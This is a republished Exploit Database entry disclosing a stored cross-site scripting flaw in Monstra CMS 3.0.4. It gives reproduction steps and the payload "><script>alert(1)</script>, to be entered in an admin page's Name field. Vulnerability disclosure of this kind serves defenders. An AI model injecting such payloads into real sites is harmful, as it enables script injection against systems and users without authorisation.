Monstra 3.0.4 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 142 阅读

• 作者： tmrswrr
  日期： 2023-06-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51519/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  # Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested : https://www.softaculous.com/softaculous/demos/Monstra     --- Description ---   1) Login admin panel and go to Pages: https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 2) Click edit button andwrite your payload in the Name field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button https://demos3.softaculous.com/Monstraggybvrnbr4/